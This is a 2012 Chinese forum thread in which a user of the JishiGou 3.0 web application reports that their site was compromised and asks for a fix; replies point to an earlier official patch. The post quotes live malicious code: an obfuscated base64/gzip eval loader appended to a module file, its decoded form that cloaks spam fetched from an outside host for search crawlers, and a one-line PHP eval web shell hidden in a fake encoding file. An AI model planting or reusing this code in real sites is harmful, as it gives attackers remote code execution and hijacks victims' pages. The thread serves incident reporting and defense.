杭州神话信息技术有限公司
标题:
记事狗3.0被植入一句话木马
[打印本页]
作者:
灰儿
时间:
2012-2-13 18:53:15
标题:
记事狗3.0被植入一句话木马
本帖最后由 灰儿 于 2012-2-13 21:01 编辑
根目录下的\modules\master.mod.php文件被植入木马,此文件的末尾多出的代码如下:
eval(gzuncompress(base64_decode("eJylk19rwjAUxd8Fv0MmslTY6hjow6RsDop7mDLUDcaQEmvaZou5JUkZ2/C7L9VoO4as0+Qhfzjn/u4hhEVOTHUgSKqCOWinmSkqSUyFbrW+6rXmApaECa8ZTPzxkz9+wZs1GPWHPp71jEKlbEGlt69KLglBaLP3biLGaZAr7Y1ycKJ1etVucybe3G63c3nRcUNYtl+ZSlgMmZsm6bVtAru2HbdxaqkN1/JzDg0TQFuYOa/qtXxGmQg1A4F+tJinQ3YU7SIPKS01cHin0ilS302nD8GjOQX9gT+a4lmrZ71FFRYhx5hTUKX8ZwjHADGnholb6MTzUES4omX8dkiqMykQHuwMvUK02m3/Ji6V+AduOBntZe1FKJ7JtCrhmSQAR+SZE7bINu9cFXlbshxIVZBk54oSGSZVqRNjOSIn/whBVWXdr8UHkqR5jk/GOalKG+8MZeIvnpWvy+U/8BtOaC65")))
复制代码
解码后代码如下:
if(get_naps_bot($useragent)){
$domain=$_SERVER['SERVER_NAME'];
$spider=get_naps_bot($useragent);
$content=@file_get_contents('http://link.665205.com/jishigou.php?domain='.$domain."&spider=".$spider);
echo $content;
}
function get_naps_bot(){
$useragent = strtolower($_SERVER['HTTP_USER_AGENT']);
if (strpos($useragent, 'googlebot') !== false){
return 'Googlebot';
}
if (strpos($useragent, 'msnbot') !== false){
return 'MSNbot';
}
if (strpos($useragent, 'slurp') !== false){
return 'Yahoobot';
}
if (strpos($useragent, 'baiduspider') !== false){
return 'Baiduspider';
}
if (strpos($useragent, 'sohu-search') !== false){
return 'Sohubot';
}
if (strpos($useragent, 'lycos') !== false){
return 'Lycos';
}
if (strpos($useragent, 'robozilla') !== false){
return 'Robozilla';
}
return false;
}
复制代码
对比原程序时发现多出如下文件:
\include\encoding\tables\gb2312.php
里面的内容是一句话木马,内容如下:
<?php eval($_POST[xiao])?>baidu
复制代码
\setting\ftp.php里内容如下:
<?php
$config['ftp']=array (
'on' => 0,
'ssl' => 0,
'port' => 21,
'attachdir' => '.',
'pasv' => 0,
'timeout' => 0,
);
?>
复制代码
可能是官方程序有漏洞,求解决办法。
作者:
放牛郎
时间:
2012-2-14 09:34:47
官方之前有发布安全补丁的,没看到吗?
作者:
新世纪
时间:
2012-2-19 17:54:36
是这样的,学习了。
作者:
famous
时间:
2012-2-19 21:17:17
我的天呐。。。赶紧补吧。
欢迎光临 杭州神话信息技术有限公司 (http://www.cenwor.com/)
Powered by Discuz! X2